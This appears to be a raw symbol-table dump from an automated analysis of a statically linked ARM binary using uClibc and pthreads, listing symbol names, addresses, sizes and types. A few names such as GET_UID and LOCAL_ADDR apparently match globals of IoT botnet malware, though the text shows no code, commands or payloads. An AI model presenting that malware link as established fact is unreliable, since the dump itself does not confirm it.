                                                            $d.symtab0x2d1d80NOTYPE<unknown>DEFAULT14
                                                            $d.symtab0x2b80NOTYPE<unknown>DEFAULT22
                                                            $d.symtab0x118f0NOTYPE<unknown>DEFAULT24
                                                            $d.symtab0x00TLS<unknown>DEFAULT8
                                                            $d.symtab0x2d3d40NOTYPE<unknown>DEFAULT14
                                                            $d.symtab0x247b40NOTYPE<unknown>DEFAULT4
                                                            C.0.4262.symtab0x234f428OBJECT<unknown>DEFAULT4
                                                            C.11.5548.symtab0x2473812OBJECT<unknown>DEFAULT4
                                                            C.5.5083.symtab0x23a6424OBJECT<unknown>DEFAULT4
                                                            C.7.5370.symtab0x2474412OBJECT<unknown>DEFAULT4
                                                            C.7.6078.symtab0x23a7c12OBJECT<unknown>DEFAULT4
                                                            C.7.6109.symtab0x23aac12OBJECT<unknown>DEFAULT4
                                                            C.7.6182.symtab0x23a8812OBJECT<unknown>DEFAULT4
                                                            C.8.6110.symtab0x23aa012OBJECT<unknown>DEFAULT4
                                                            C.9.5793.symtab0x2375864OBJECT<unknown>DEFAULT4
                                                            C.9.6119.symtab0x23a9412OBJECT<unknown>DEFAULT4
                                                            GET_UID.symtab0x321bc1OBJECT<unknown>DEFAULT15
                                                            LOCAL_ADDR.symtab0x321b84OBJECT<unknown>DEFAULT15
                                                            Laligned.symtab0x1a3780NOTYPE<unknown>DEFAULT2
                                                            Llastword.symtab0x1a3940NOTYPE<unknown>DEFAULT2
                                                            _Exit.symtab0x170f4104FUNC<unknown>DEFAULT2
                                                            _GLOBAL_OFFSET_TABLE_.symtab0x2d0140OBJECT<unknown>HIDDEN13
                                                            _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                            _Unwind_Complete.symtab0x159584FUNC<unknown>HIDDEN2
                                                            _Unwind_DeleteException.symtab0x1595c44FUNC<unknown>HIDDEN2
                                                            _Unwind_ForcedUnwind.symtab0x1660c36FUNC<unknown>HIDDEN2
                                                            _Unwind_GetCFA.symtab0x159508FUNC<unknown>HIDDEN2
                                                            _Unwind_GetDataRelBase.symtab0x1599412FUNC<unknown>HIDDEN2
                                                            _Unwind_GetLanguageSpecificData.symtab0x1663068FUNC<unknown>HIDDEN2
                                                            _Unwind_GetRegionStart.symtab0x16dd052FUNC<unknown>HIDDEN2
                                                            _Unwind_GetTextRelBase.symtab0x1598812FUNC<unknown>HIDDEN2
                                                            _Unwind_RaiseException.symtab0x165a036FUNC<unknown>HIDDEN2
                                                            _Unwind_Resume.symtab0x165c436FUNC<unknown>HIDDEN2
                                                            _Unwind_Resume_or_Rethrow.symtab0x165e836FUNC<unknown>HIDDEN2
                                                            _Unwind_VRS_Get.symtab0x158b876FUNC<unknown>HIDDEN2
                                                            _Unwind_VRS_Pop.symtab0x15ed0324FUNC<unknown>HIDDEN2
                                                            _Unwind_VRS_Set.symtab0x1590476FUNC<unknown>HIDDEN2
                                                            _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                            __C_ctype_b.symtab0x2d3d44OBJECT<unknown>DEFAULT14
                                                            __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                            __C_ctype_b_data.symtab0x247b4768OBJECT<unknown>DEFAULT4
                                                            __EH_FRAME_BEGIN__.symtab0x2d0000OBJECT<unknown>DEFAULT7
                                                            __FRAME_END__.symtab0x2d0000OBJECT<unknown>DEFAULT7
                                                            __GI___C_ctype_b.symtab0x2d3d44OBJECT<unknown>HIDDEN14
                                                            __GI___close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                                            __GI___close_nocancel.symtab0x1daf424FUNC<unknown>HIDDEN2
                                                            __GI___ctype_b.symtab0x2d3d84OBJECT<unknown>HIDDEN14
                                                            __GI___errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __GI___fcntl_nocancel.symtab0x16f28152FUNC<unknown>HIDDEN2
                                                            __GI___fgetc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                                            __GI___glibc_strerror_r.symtab0x1a5c024FUNC<unknown>HIDDEN2
                                                            __GI___libc_close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                                            __GI___libc_fcntl.symtab0x16fc0244FUNC<unknown>HIDDEN2
                                                            __GI___libc_open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                                            __GI___libc_read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                                            __GI___libc_write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                                            __GI___longjmp.symtab0x1edd420FUNC<unknown>HIDDEN2
                                                            __GI___nptl_create_event.symtab0x151084FUNC<unknown>HIDDEN2
                                                            __GI___nptl_death_event.symtab0x1510c4FUNC<unknown>HIDDEN2
                                                            __GI___open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                                            __GI___open_nocancel.symtab0x1db8424FUNC<unknown>HIDDEN2
                                                            __GI___pthread_cleanup_upto.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __GI___pthread_keys.symtab0x2d5088192OBJECT<unknown>HIDDEN15
                                                            __GI___pthread_unwind.symtab0x1428484FUNC<unknown>HIDDEN2
                                                            __GI___pthread_unwind_next.symtab0x142d816FUNC<unknown>HIDDEN2
                                                            __GI___read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                                            __GI___read_nocancel.symtab0x1dca424FUNC<unknown>HIDDEN2
                                                            __GI___register_atfork.symtab0x1d7f0392FUNC<unknown>HIDDEN2
                                                            __GI___stack_user.symtab0x2d4e88OBJECT<unknown>HIDDEN15
                                                            __GI___uClibc_fini.symtab0x1e894124FUNC<unknown>HIDDEN2
                                                            __GI___uClibc_init.symtab0x1e96488FUNC<unknown>HIDDEN2
                                                            __GI___write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                                            __GI___write_nocancel.symtab0x1dc1424FUNC<unknown>HIDDEN2
                                                            __GI___xpg_strerror_r.symtab0x1a5d8268FUNC<unknown>HIDDEN2
                                                            __GI__exit.symtab0x170f4104FUNC<unknown>HIDDEN2
                                                            __GI_abort.symtab0x1c184296FUNC<unknown>HIDDEN2
                                                            __GI_accept.symtab0x1a820116FUNC<unknown>HIDDEN2
                                                            __GI_atoi.symtab0x1c8d032FUNC<unknown>HIDDEN2
                                                            __GI_bind.symtab0x1a89468FUNC<unknown>HIDDEN2
                                                            __GI_brk.symtab0x212fc88FUNC<unknown>HIDDEN2
                                                            __GI_close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                                            __GI_closedir.symtab0x1796c272FUNC<unknown>HIDDEN2
                                                            __GI_config_close.symtab0x1f56c52FUNC<unknown>HIDDEN2
                                                            __GI_config_open.symtab0x1f5a072FUNC<unknown>HIDDEN2
                                                            __GI_config_read.symtab0x1f244808FUNC<unknown>HIDDEN2
                                                            __GI_connect.symtab0x1a91c116FUNC<unknown>HIDDEN2
                                                            __GI_exit.symtab0x1cae4196FUNC<unknown>HIDDEN2
                                                            __GI_fclose.symtab0x17ddc816FUNC<unknown>HIDDEN2
                                                            __GI_fcntl.symtab0x16fc0244FUNC<unknown>HIDDEN2
                                                            __GI_fflush_unlocked.symtab0x19d28940FUNC<unknown>HIDDEN2
                                                            __GI_fgetc.symtab0x20578324FUNC<unknown>HIDDEN2
                                                            __GI_fgetc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                                            __GI_fgets.symtab0x1995c284FUNC<unknown>HIDDEN2
                                                            __GI_fgets_unlocked.symtab0x1a0d4160FUNC<unknown>HIDDEN2
                                                            __GI_fopen.symtab0x1810c32FUNC<unknown>HIDDEN2
                                                            __GI_fork.symtab0x1d37c972FUNC<unknown>HIDDEN2
                                                            __GI_fprintf.symtab0x1f71c48FUNC<unknown>HIDDEN2
                                                            __GI_fputs_unlocked.symtab0x1a17456FUNC<unknown>HIDDEN2
                                                            __GI_fseek.symtab0x2149c36FUNC<unknown>HIDDEN2
                                                            __GI_fseeko64.symtab0x214c0448FUNC<unknown>HIDDEN2
                                                            __GI_fstat.symtab0x1edf4100FUNC<unknown>HIDDEN2
                                                            __GI_fwrite_unlocked.symtab0x1a1ac188FUNC<unknown>HIDDEN2
                                                            __GI_getc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                                            __GI_getdtablesize.symtab0x1eef844FUNC<unknown>HIDDEN2
                                                            __GI_getegid.symtab0x1ef2420FUNC<unknown>HIDDEN2
                                                            __GI_geteuid.symtab0x1ef3820FUNC<unknown>HIDDEN2
                                                            __GI_getgid.symtab0x1ef4c20FUNC<unknown>HIDDEN2
                                                            __GI_getpagesize.symtab0x1715c40FUNC<unknown>HIDDEN2
                                                            __GI_getpid.symtab0x1d97872FUNC<unknown>HIDDEN2
                                                            __GI_getrlimit.symtab0x1719856FUNC<unknown>HIDDEN2
                                                            __GI_getsockname.symtab0x1a99068FUNC<unknown>HIDDEN2
                                                            __GI_gettimeofday.symtab0x171d064FUNC<unknown>HIDDEN2
                                                            __GI_getuid.symtab0x1ef6020FUNC<unknown>HIDDEN2
                                                            __GI_inet_addr.symtab0x1a7b440FUNC<unknown>HIDDEN2
                                                            __GI_inet_aton.symtab0x211c4248FUNC<unknown>HIDDEN2
                                                            __GI_initstate_r.symtab0x1c6ec248FUNC<unknown>HIDDEN2
                                                            __GI_ioctl.symtab0x1ef74224FUNC<unknown>HIDDEN2
                                                            __GI_isatty.symtab0x1a71436FUNC<unknown>HIDDEN2
                                                            __GI_kill.symtab0x1721056FUNC<unknown>HIDDEN2
                                                            __GI_listen.symtab0x1aa1c64FUNC<unknown>HIDDEN2
                                                            __GI_lseek64.symtab0x21960112FUNC<unknown>HIDDEN2
                                                            __GI_memchr.symtab0x20c80240FUNC<unknown>HIDDEN2
                                                            __GI_memcpy.symtab0x1a2704FUNC<unknown>HIDDEN2
                                                            __GI_memmove.symtab0x1a2804FUNC<unknown>HIDDEN2
                                                            __GI_mempcpy.symtab0x1a3b036FUNC<unknown>HIDDEN2
                                                            __GI_memrchr.symtab0x20d70224FUNC<unknown>HIDDEN2
                                                            __GI_memset.symtab0x1a290156FUNC<unknown>HIDDEN2
                                                            __GI_mmap.symtab0x16e04124FUNC<unknown>HIDDEN2
                                                            __GI_mremap.symtab0x1f05468FUNC<unknown>HIDDEN2
                                                            __GI_munmap.symtab0x1730064FUNC<unknown>HIDDEN2
                                                            __GI_nanosleep.symtab0x1738096FUNC<unknown>HIDDEN2
                                                            __GI_open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                                            __GI_opendir.symtab0x17b4c196FUNC<unknown>HIDDEN2
                                                            __GI_raise.symtab0x1d9c0240FUNC<unknown>HIDDEN2
                                                            __GI_random.symtab0x1c2c4164FUNC<unknown>HIDDEN2
                                                            __GI_random_r.symtab0x1c584144FUNC<unknown>HIDDEN2
                                                            __GI_rawmemchr.symtab0x218b0176FUNC<unknown>HIDDEN2
                                                            __GI_read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                                            __GI_readdir.symtab0x17cc0232FUNC<unknown>HIDDEN2
                                                            __GI_readdir64.symtab0x1f158236FUNC<unknown>HIDDEN2
                                                            __GI_readlink.symtab0x1742464FUNC<unknown>HIDDEN2
                                                            __GI_recv.symtab0x1aaa0112FUNC<unknown>HIDDEN2
                                                            __GI_recvfrom.symtab0x1ab58136FUNC<unknown>HIDDEN2
                                                            __GI_remove.symtab0x1812c100FUNC<unknown>HIDDEN2
                                                            __GI_rmdir.symtab0x1f09864FUNC<unknown>HIDDEN2
                                                            __GI_sbrk.symtab0x1f0d8108FUNC<unknown>HIDDEN2
                                                            __GI_select.symtab0x175d0132FUNC<unknown>HIDDEN2
                                                            __GI_send.symtab0x1ac24112FUNC<unknown>HIDDEN2
                                                            __GI_sendto.symtab0x1ace0136FUNC<unknown>HIDDEN2
                                                            __GI_setsid.symtab0x1765464FUNC<unknown>HIDDEN2
                                                            __GI_setsockopt.symtab0x1ad6872FUNC<unknown>HIDDEN2
                                                            __GI_setstate_r.symtab0x1c7e4236FUNC<unknown>HIDDEN2
                                                            __GI_sigaction.symtab0x16e80136FUNC<unknown>HIDDEN2
                                                            __GI_sigprocmask.symtab0x17694140FUNC<unknown>HIDDEN2
                                                            __GI_snprintf.symtab0x1819048FUNC<unknown>HIDDEN2
                                                            __GI_socket.symtab0x1adb068FUNC<unknown>HIDDEN2
                                                            __GI_sprintf.symtab0x181c052FUNC<unknown>HIDDEN2
                                                            __GI_srandom_r.symtab0x1c614216FUNC<unknown>HIDDEN2
                                                            __GI_stat.symtab0x17720100FUNC<unknown>HIDDEN2
                                                            __GI_strchr.symtab0x20e50240FUNC<unknown>HIDDEN2
                                                            __GI_strchrnul.symtab0x20f40236FUNC<unknown>HIDDEN2
                                                            __GI_strcmp.symtab0x1a33028FUNC<unknown>HIDDEN2
                                                            __GI_strcoll.symtab0x1a33028FUNC<unknown>HIDDEN2
                                                            __GI_strcpy.symtab0x1a3d436FUNC<unknown>HIDDEN2
                                                            __GI_strcspn.symtab0x2102c68FUNC<unknown>HIDDEN2
                                                            __GI_strlen.symtab0x1a35096FUNC<unknown>HIDDEN2
                                                            __GI_strnlen.symtab0x1a3f8204FUNC<unknown>HIDDEN2
                                                            __GI_strpbrk.symtab0x2118464FUNC<unknown>HIDDEN2
                                                            __GI_strrchr.symtab0x2107080FUNC<unknown>HIDDEN2
                                                            __GI_strspn.symtab0x210c076FUNC<unknown>HIDDEN2
                                                            __GI_strstr.symtab0x1a4c4252FUNC<unknown>HIDDEN2
                                                            __GI_strtok.symtab0x1a6e448FUNC<unknown>HIDDEN2
                                                            __GI_strtok_r.symtab0x2110c120FUNC<unknown>HIDDEN2
                                                            __GI_strtol.symtab0x1c8f028FUNC<unknown>HIDDEN2
                                                            __GI_sysconf.symtab0x1ccf41572FUNC<unknown>HIDDEN2
                                                            __GI_tcgetattr.symtab0x1a738124FUNC<unknown>HIDDEN2
                                                            __GI_time.symtab0x1778448FUNC<unknown>HIDDEN2
                                                            __GI_times.symtab0x1f14420FUNC<unknown>HIDDEN2
                                                            __GI_unlink.symtab0x177b464FUNC<unknown>HIDDEN2
                                                            __GI_vfprintf.symtab0x20434324FUNC<unknown>HIDDEN2
                                                            __GI_vsnprintf.symtab0x181f4208FUNC<unknown>HIDDEN2
                                                            __GI_wcrtomb.symtab0x1f5e884FUNC<unknown>HIDDEN2
                                                            __GI_wcsnrtombs.symtab0x1f660188FUNC<unknown>HIDDEN2
                                                            __GI_wcsrtombs.symtab0x1f63c36FUNC<unknown>HIDDEN2
                                                            __GI_write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                                            __JCR_END__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                                            __JCR_LIST__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                                            ___Unwind_ForcedUnwind.symtab0x1660c36FUNC<unknown>HIDDEN2
                                                            ___Unwind_RaiseException.symtab0x165a036FUNC<unknown>HIDDEN2
                                                            ___Unwind_Resume.symtab0x165c436FUNC<unknown>HIDDEN2
                                                            ___Unwind_Resume_or_Rethrow.symtab0x165e836FUNC<unknown>HIDDEN2
                                                            __adddf3.symtab0x219dc784FUNC<unknown>HIDDEN2
                                                            __aeabi_cdcmpeq.symtab0x2233824FUNC<unknown>HIDDEN2
                                                            __aeabi_cdcmple.symtab0x2233824FUNC<unknown>HIDDEN2
                                                            __aeabi_cdrcmple.symtab0x2231c52FUNC<unknown>HIDDEN2
                                                            __aeabi_d2uiz.symtab0x223c884FUNC<unknown>HIDDEN2
                                                            __aeabi_dadd.symtab0x219dc784FUNC<unknown>HIDDEN2
                                                            __aeabi_dcmpeq.symtab0x2235024FUNC<unknown>HIDDEN2
                                                            __aeabi_dcmpge.symtab0x2239824FUNC<unknown>HIDDEN2
                                                            __aeabi_dcmpgt.symtab0x223b024FUNC<unknown>HIDDEN2
                                                            __aeabi_dcmple.symtab0x2238024FUNC<unknown>HIDDEN2
                                                            __aeabi_dcmplt.symtab0x2236824FUNC<unknown>HIDDEN2
                                                            __aeabi_ddiv.symtab0x2207c524FUNC<unknown>HIDDEN2
                                                            __aeabi_dmul.symtab0x21dec656FUNC<unknown>HIDDEN2
                                                            __aeabi_drsub.symtab0x219d00FUNC<unknown>HIDDEN2
                                                            __aeabi_dsub.symtab0x219d8788FUNC<unknown>HIDDEN2
                                                            __aeabi_f2d.symtab0x21d3864FUNC<unknown>HIDDEN2
                                                            __aeabi_i2d.symtab0x21d1040FUNC<unknown>HIDDEN2
                                                            __aeabi_idiv.symtab0x157600FUNC<unknown>HIDDEN2
                                                            __aeabi_idivmod.symtab0x1588c24FUNC<unknown>HIDDEN2
                                                            __aeabi_l2d.symtab0x21d8c96FUNC<unknown>HIDDEN2
                                                            __aeabi_read_tp.symtab0x111a08FUNC<unknown>HIDDEN2
                                                            __aeabi_ui2d.symtab0x21cec36FUNC<unknown>HIDDEN2
                                                            __aeabi_uidiv.symtab0x1564c0FUNC<unknown>HIDDEN2
                                                            __aeabi_uidivmod.symtab0x1574824FUNC<unknown>HIDDEN2
                                                            __aeabi_ul2d.symtab0x21d78116FUNC<unknown>HIDDEN2
                                                            __aeabi_unwind_cpp_pr0.symtab0x1656c8FUNC<unknown>HIDDEN2
                                                            __aeabi_unwind_cpp_pr1.symtab0x165648FUNC<unknown>HIDDEN2
                                                            __aeabi_unwind_cpp_pr2.symtab0x1655c8FUNC<unknown>HIDDEN2
                                                            __app_fini.symtab0x321ac4OBJECT<unknown>HIDDEN15
                                                            __atexit_lock.symtab0x2d3ac24OBJECT<unknown>DEFAULT14
                                                            __bss_end__.symtab0x326380NOTYPE<unknown>DEFAULTSHN_ABS
                                                            __bss_start.symtab0x2d3dc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                            __bss_start__.symtab0x2d3dc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                            __check_one_fd.symtab0x1e91084FUNC<unknown>DEFAULT2
                                                            __clone.symtab0x1d318100FUNC<unknown>DEFAULT2
                                                            __close.symtab0x1db10100FUNC<unknown>DEFAULT2
                                                            __close_nocancel.symtab0x1daf424FUNC<unknown>DEFAULT2
                                                            __cmpdf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                                            __ctype_b.symtab0x2d3d84OBJECT<unknown>DEFAULT14
                                                            __curbrk.symtab0x321b44OBJECT<unknown>HIDDEN15
                                                            __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __data_start.symtab0x2d0d40NOTYPE<unknown>DEFAULT14
                                                            __deallocate_stack.symtab0x11cbc304FUNC<unknown>HIDDEN2
                                                            __default_rt_sa_restorer.symtab0x16f200FUNC<unknown>DEFAULT2
                                                            __default_sa_restorer.symtab0x16f140FUNC<unknown>DEFAULT2
                                                            __default_stacksize.symtab0x2d1d84OBJECT<unknown>HIDDEN14
                                                            __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __div0.symtab0x158a420FUNC<unknown>HIDDEN2
                                                            __divdf3.symtab0x2207c524FUNC<unknown>HIDDEN2
                                                            __divsi3.symtab0x15760300FUNC<unknown>HIDDEN2
                                                            __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                                                            __do_global_dtors_aux_fini_array_entry.symtab0x2d00c0OBJECT<unknown>DEFAULT11
                                                            __end__.symtab0x326380NOTYPE<unknown>DEFAULTSHN_ABS
                                                            __environ.symtab0x321a44OBJECT<unknown>DEFAULT15
                                                            __eqdf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                                            __errno_location.symtab0x111fc32FUNC<unknown>DEFAULT2
                                                            __error.symtab0x1d3780NOTYPE<unknown>DEFAULT2
                                                            __exidx_end.symtab0x24ca00NOTYPE<unknown>DEFAULTSHN_ABS
                                                            __exidx_start.symtab0x24b300NOTYPE<unknown>DEFAULTSHN_ABS
                                                            __exit_cleanup.symtab0x317184OBJECT<unknown>HIDDEN15
                                                            __extendsfdf2.symtab0x21d3864FUNC<unknown>HIDDEN2
                                                            __fcntl_nocancel.symtab0x16f28152FUNC<unknown>DEFAULT2
                                                            __fgetc_unlocked.symtab0x206bc300FUNC<unknown>DEFAULT2
                                                            __find_in_stack_list.symtab0x114b0308FUNC<unknown>HIDDEN2
                                                            __fini_array_end.symtab0x2d0100NOTYPE<unknown>HIDDEN11
                                                            __fini_array_start.symtab0x2d00c0NOTYPE<unknown>HIDDEN11
                                                            __fixunsdfsi.symtab0x223c884FUNC<unknown>HIDDEN2
                                                            __floatdidf.symtab0x21d8c96FUNC<unknown>HIDDEN2
                                                            __floatsidf.symtab0x21d1040FUNC<unknown>HIDDEN2
                                                            __floatundidf.symtab0x21d78116FUNC<unknown>HIDDEN2
                                                            __floatunsidf.symtab0x21cec36FUNC<unknown>HIDDEN2
                                                            __fork.symtab0x1107424FUNC<unknown>DEFAULT2
                                                            __fork_generation.symtab0x322284OBJECT<unknown>HIDDEN15
                                                            __fork_generation_pointer.symtab0x326044OBJECT<unknown>HIDDEN15
                                                            __fork_handlers.symtab0x326084OBJECT<unknown>HIDDEN15
                                                            __fork_lock.symtab0x3171c4OBJECT<unknown>HIDDEN15
                                                            __frame_dummy_init_array_entry.symtab0x2d0080OBJECT<unknown>DEFAULT10
                                                            __free_stacks.symtab0x11c18164FUNC<unknown>HIDDEN2
                                                            __free_tcb.symtab0x11dec116FUNC<unknown>HIDDEN2
                                                            __gedf2.symtab0x22288148FUNC<unknown>HIDDEN2
                                                            __getdents.symtab0x1ee58160FUNC<unknown>HIDDEN2
                                                            __getdents64.symtab0x21354328FUNC<unknown>HIDDEN2
                                                            __getpagesize.symtab0x1715c40FUNC<unknown>DEFAULT2
                                                            __getpid.symtab0x1d97872FUNC<unknown>DEFAULT2
                                                            __glibc_strerror_r.symtab0x1a5c024FUNC<unknown>DEFAULT2
                                                            __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                            __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __gnu_Unwind_ForcedUnwind.symtab0x15d1028FUNC<unknown>HIDDEN2
                                                            __gnu_Unwind_RaiseException.symtab0x15df8184FUNC<unknown>HIDDEN2
                                                            __gnu_Unwind_Restore_VFP.symtab0x165900FUNC<unknown>HIDDEN2
                                                            __gnu_Unwind_Resume.symtab0x15d8c108FUNC<unknown>HIDDEN2
                                                            __gnu_Unwind_Resume_or_Rethrow.symtab0x15eb032FUNC<unknown>HIDDEN2
                                                            __gnu_Unwind_Save_VFP.symtab0x165980FUNC<unknown>HIDDEN2
                                                            __gnu_unwind_execute.symtab0x166741812FUNC<unknown>HIDDEN2
                                                            __gnu_unwind_frame.symtab0x16d8872FUNC<unknown>HIDDEN2
                                                            __gnu_unwind_pr_common.symtab0x160141352FUNC<unknown>DEFAULT2
                                                            __gtdf2.symtab0x22288148FUNC<unknown>HIDDEN2
                                                            __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __init_array_end.symtab0x2d00c0NOTYPE<unknown>HIDDEN10
                                                            __init_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN10
                                                            __init_sched_fifo_prio.symtab0x14ab476FUNC<unknown>HIDDEN2
                                                            __is_smp.symtab0x322204OBJECT<unknown>HIDDEN15
                                                            __ledf2.symtab0x22290140FUNC<unknown>HIDDEN2
                                                            __libc_accept.symtab0x1a820116FUNC<unknown>DEFAULT2
                                                            __libc_close.symtab0x1db10100FUNC<unknown>DEFAULT2
                                                            __libc_connect.symtab0x1a91c116FUNC<unknown>DEFAULT2
                                                            __libc_disable_asynccancel.symtab0x1dd30136FUNC<unknown>HIDDEN2
                                                            __libc_enable_asynccancel.symtab0x1ddb8220FUNC<unknown>HIDDEN2
                                                            __libc_errno.symtab0x44TLS<unknown>HIDDEN9
                                                            __libc_fcntl.symtab0x16fc0244FUNC<unknown>DEFAULT2
                                                            __libc_fork.symtab0x1d37c972FUNC<unknown>DEFAULT2
                                                            __libc_h_errno.symtab0x84TLS<unknown>HIDDEN9
                                                            __libc_longjmp.symtab0x1724856FUNC<unknown>DEFAULT2
                                                            __libc_multiple_threads.symtab0x3260c4OBJECT<unknown>HIDDEN15
                                                            __libc_multiple_threads_ptr.symtab0x3221c4OBJECT<unknown>HIDDEN15
                                                            __libc_nanosleep.symtab0x1738096FUNC<unknown>DEFAULT2
                                                            __libc_open.symtab0x1dba0100FUNC<unknown>DEFAULT2
                                                            __libc_pthread_init.symtab0x1d74868FUNC<unknown>DEFAULT2
                                                            __libc_read.symtab0x1dcc0100FUNC<unknown>DEFAULT2
                                                            __libc_recv.symtab0x1aaa0112FUNC<unknown>DEFAULT2
                                                            __libc_recvfrom.symtab0x1ab58136FUNC<unknown>DEFAULT2
                                                            __libc_resp.symtab0x04TLS<unknown>HIDDEN8
                                                            __libc_select.symtab0x175d0132FUNC<unknown>DEFAULT2
                                                            __libc_send.symtab0x1ac24112FUNC<unknown>DEFAULT2
                                                            __libc_sendto.symtab0x1ace0136FUNC<unknown>DEFAULT2
                                                            __libc_setup_tls.symtab0x1df98560FUNC<unknown>DEFAULT2
                                                            __libc_sigaction.symtab0x16e80136FUNC<unknown>DEFAULT2
                                                            __libc_siglongjmp.symtab0x1724856FUNC<unknown>DEFAULT2
                                                            __libc_stack_end.symtab0x321a04OBJECT<unknown>DEFAULT15
                                                            __libc_write.symtab0x1dc30100FUNC<unknown>DEFAULT2
                                                            __linkin_atfork.symtab0x1d78c100FUNC<unknown>HIDDEN2
                                                            __lll_lock_wait.symtab0x144ac156FUNC<unknown>HIDDEN2
                                                            __lll_lock_wait_private.symtab0x14414152FUNC<unknown>HIDDEN2
                                                            __lll_robust_lock_wait.symtab0x1489c208FUNC<unknown>HIDDEN2
                                                            __lll_robust_timedlock_wait.symtab0x14750332FUNC<unknown>HIDDEN2
                                                            __lll_timedlock_wait.symtab0x14620304FUNC<unknown>HIDDEN2
                                                            __lll_timedwait_tid.symtab0x14548216FUNC<unknown>HIDDEN2
                                                            __longjmp.symtab0x1edd420FUNC<unknown>DEFAULT2
                                                            __ltdf2.symtab0x22290140FUNC<unknown>HIDDEN2
                                                            __make_stacks_executable.symtab0x11adc8FUNC<unknown>HIDDEN2
                                                            __malloc_consolidate.symtab0x1bd54436FUNC<unknown>HIDDEN2
                                                            __malloc_largebin_index.symtab0x1adf4120FUNC<unknown>DEFAULT2
                                                            __malloc_lock.symtab0x2d2d024OBJECT<unknown>DEFAULT14
                                                            __malloc_state.symtab0x3228c888OBJECT<unknown>DEFAULT15
                                                            __malloc_trim.symtab0x1bca4176FUNC<unknown>DEFAULT2
                                                            __muldf3.symtab0x21dec656FUNC<unknown>HIDDEN2
                                                            __nedf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                                            __nptl_create_event.symtab0x151084FUNC<unknown>DEFAULT2
                                                            __nptl_deallocate_tsd.symtab0x11ae4308FUNC<unknown>HIDDEN2
                                                            __nptl_death_event.symtab0x1510c4FUNC<unknown>DEFAULT2
                                                            __nptl_initial_report_events.symtab0x2f50c1OBJECT<unknown>DEFAULT15
                                                            __nptl_last_event.symtab0x2d4fc4OBJECT<unknown>DEFAULT15
                                                            __nptl_nthreads.symtab0x2d1c44OBJECT<unknown>DEFAULT14
                                                            __nptl_setxid.symtab0x117e4688FUNC<unknown>HIDDEN2
                                                            __nptl_threads_events.symtab0x2d4f48OBJECT<unknown>DEFAULT15
                                                            __open.symtab0x1dba0100FUNC<unknown>DEFAULT2
                                                            __open_nocancel.symtab0x1db8424FUNC<unknown>DEFAULT2
                                                            __pagesize.symtab0x321a84OBJECT<unknown>DEFAULT15
                                                            __preinit_array_end.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                                            __preinit_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                                            __progname.symtab0x2d3cc4OBJECT<unknown>DEFAULT14
                                                            __progname_full.symtab0x2d3d04OBJECT<unknown>DEFAULT14
                                                            __pthread_cleanup_pop.symtab0x14f3c56FUNC<unknown>HIDDEN2
                                                            __pthread_cleanup_pop_restore.symtab0x15018240FUNC<unknown>DEFAULT2
                                                            __pthread_cleanup_push.symtab0x14f7440FUNC<unknown>HIDDEN2
                                                            __pthread_cleanup_push_defer.symtab0x14f9c124FUNC<unknown>DEFAULT2
                                                            __pthread_create_2_1.symtab0x124ac2692FUNC<unknown>DEFAULT2
                                                            __pthread_current_priority.symtab0x14974320FUNC<unknown>HIDDEN2
                                                            __pthread_debug.symtab0x322184OBJECT<unknown>HIDDEN15
                                                            __pthread_disable_asynccancel.symtab0x14dec136FUNC<unknown>HIDDEN2
                                                            __pthread_enable_asynccancel.symtab0x14e74200FUNC<unknown>HIDDEN2
                                                            __pthread_init_static_tls.symtab0x12f30412FUNC<unknown>HIDDEN2
                                                            __pthread_initialize_minimal.symtab0x1535c752FUNC<unknown>DEFAULT2
                                                            __pthread_initialize_minimal_internal.symtab0x1535c752FUNC<unknown>HIDDEN2
                                                            __pthread_keys.symtab0x2d5088192OBJECT<unknown>DEFAULT15
                                                            __pthread_multiple_threads.symtab0x322244OBJECT<unknown>HIDDEN15
                                                            __pthread_mutex_lock.symtab0x13a30576FUNC<unknown>PROTECTED2
                                                            __pthread_mutex_lock_full.symtab0x1347c1460FUNC<unknown>DEFAULT2
                                                            __pthread_mutex_lock_internal.symtab0x13a30576FUNC<unknown>HIDDEN2
                                                            __pthread_mutex_unlock.symtab0x1427c8FUNC<unknown>PROTECTED2
